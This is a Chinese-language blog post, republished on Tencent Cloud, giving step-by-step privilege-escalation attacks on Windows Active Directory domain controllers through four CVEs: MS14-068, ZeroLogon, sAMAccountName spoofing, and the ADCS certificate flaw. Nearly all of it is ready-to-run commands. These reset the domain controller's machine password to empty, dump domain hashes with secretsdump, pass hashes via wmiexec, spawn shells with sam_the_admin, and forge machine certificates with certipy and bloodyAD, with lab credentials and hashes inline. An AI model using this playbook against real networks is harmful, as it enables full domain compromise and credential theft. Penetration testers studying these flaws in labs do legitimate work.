前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >【权限提升】WIN系统&AD域控&NetLogon&ADCS&PAC&KDC&CVE漏洞

【权限提升】WIN系统&AD域控&NetLogon&ADCS&PAC&KDC&CVE漏洞

作者头像
今天是几号
发布2024-07-18 15:13:21
650
发布2024-07-18 15:13:21
举报
文章被收录于专栏:Cyber Security
WIN系统&AD域控&NetLogon&ADCS&PAC&KDC&CVE漏洞

  • WIN-域控提权-CVE-2014-6324
  • WIN-域控提权-CVE-2020-1472
  • WIN-域控提权-CVE-2021-42287
  • WIN-域控提权-CVE-2022-26923 百度云资源链接

WIN-域控提权-CVE-2014-6324

前提条件: 1、需要域环境下一台主机普通用户账号密码 2、一台主机的管理员权限

代码语言:javascript
复制
whoami /user
net time /domain
net config workstation
ms14-068.exe -u 域成员名@域名 -p 域成员密码 -s 域成员sid -d 域控制器地址
ms14-068.exe -u mary@god.org -p admin!@#45 -s S-1-5-21-1218902331-2157346161-1782232778-1124 -d OWA2010CN-God.god.org
dir \\OWA2010CN-God.god.org\C$
psexec \\OWA2010CN-God.god.org cmd

CVE-2014-6324配合mimikatz拿域控主机权限

WIN-域控提权-CVE-2020-1472

CVE-2020-1472是继MS17010之后好用的NetLogon特权域控提权漏洞,影响Windows Server 2008R2至Windows Server 2019的多个版本系统,只要攻击者能访问到目标域控井且知道域控计算机名即可利用该漏洞 该漏洞不要求当前计算机在域内,也不要求当前计算机操作系统为Windows

代码语言:javascript
复制
计算机名:nbtscan -v -h 192.168.3.21
漏洞检测:python3 zerologon_tester.py OWA2010CN-GOD 192.168.3.21
重置空密码:python3 cve-2020-1472-exploit.py OWA2010CN-GOD 192.168.3.21
连接后导出:python3 secretsdump.py god.org/OWA2010CN-GOD\$@192.168.3.21 -no-pass
WMI连接反弹:python3 wmiexec.py god/administrator@192.168.3.21 -hashes aad3b435b51404eeaad3b435b51404ee:ccef208c6485269c20db2cad21734fe7

WIN-域控提权-CVE-2021-42287

只需要域用户账号密码

代码语言:javascript
复制
https://github.com/WazeHell/sam-the-admin
python3 sam_the_admin.py god/'mary:admin!@#45' -dc-ip 192.168.3.21 -shell

WIN-域控提权-CVE-2022-26923

前提条件: 1、一个域内普通账号 2、域内存在证书服务器 Kali添加访问域内信息 /etc/hosts

代码语言:javascript
复制
192.168.1.15 xiaodi.local
192.168.1.15 xiaodi-WIN-3C7SS32SQ6R-CA
192.168.1.15 WIN-3C7SS32SQ6R.xiaodi.local

获取CA结构名和计算机名

代码语言:javascript
复制
certutil -config - -ping

域内信息

代码语言:javascript
复制
192.168.1.15
test Pass123
xiaodi-WIN-3C7SS32SQ6R-CA
WIN-3C7SS32SQ6R.xiaodi.local

申请证书

代码语言:javascript
复制
certipy req 'xiaodi.local/test:Pass123@WIN-3C7SS32SQ6R.xiaodi.local' -ca xiaodi-WIN-3C7SS32SQ6R-CA -template User -debug

检测证书

代码语言:javascript
复制
certipy auth -pfx test.pfx

添加用户:

代码语言:javascript
复制
python3 bloodyAD.py -d xiaodi.local -u test -p 'Pass123' --host 192.168.1.15 addComputer pwnmachine 'CVEPassword1234*'

设置属性:

代码语言:javascript
复制
python3 bloodyAD.py -d xiaodi.local -u test -p 'Pass123' --host 192.168.1.15 setAttribute 'CN=pwnmachine,CN=Computers,DC=xiaodi,DC=local' dNSHostName '["WIN-3C7SS32SQ6R.xiaodi.local"]'

申请证书:

代码语言:javascript
复制
certipy req 'xiaodi.local/pwnmachine$:CVEPassword1234*@192.168.1.15' -template Machine -dc-ip 192.168.1.15 -ca xiaodi-WIN-3C7SS32SQ6R-CA

检测证书:

代码语言:javascript
复制
certipy auth -pfx ./win-3c7ss32sq6r.pfx -dc-ip 192.168.1.15

获取HASH:

代码语言:javascript
复制
python3 secretsdump.py 'xiaodi.local/win-3c7ss32sq6r$@WIN-3C7SS32SQ6R.xiaodi.local' -hashes :10e02bef2258ad9b239e2281a01827a4

利用HASH:

代码语言:javascript
复制
python3 wmiexec.py xiaodi.local/administrator@192.168.1.15 -hashes aad3b435b51404eeaad3b435b51404ee:e6f01fc9f2a0dc96871220f7787164bd
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2024-07-03,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • WIN系统&AD域控&NetLogon&ADCS&PAC&KDC&CVE漏洞
  • WIN-域控提权-CVE-2014-6324
  • WIN-域控提权-CVE-2020-1472
  • WIN-域控提权-CVE-2021-42287
  • WIN-域控提权-CVE-2022-26923
相关产品与服务
脆弱性检测服务
脆弱性检测服务(Vulnerability detection Service,VDS)在理解客户实际需求的情况下,制定符合企业规模的漏洞扫描方案。通过漏洞扫描器对客户指定的计算机系统、网络组件、应用程序进行全面的漏洞检测服务,由腾讯云安全专家对扫描结果进行解读,为您提供专业的漏洞修复建议和指导服务,有效地降低企业资产安全风险。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档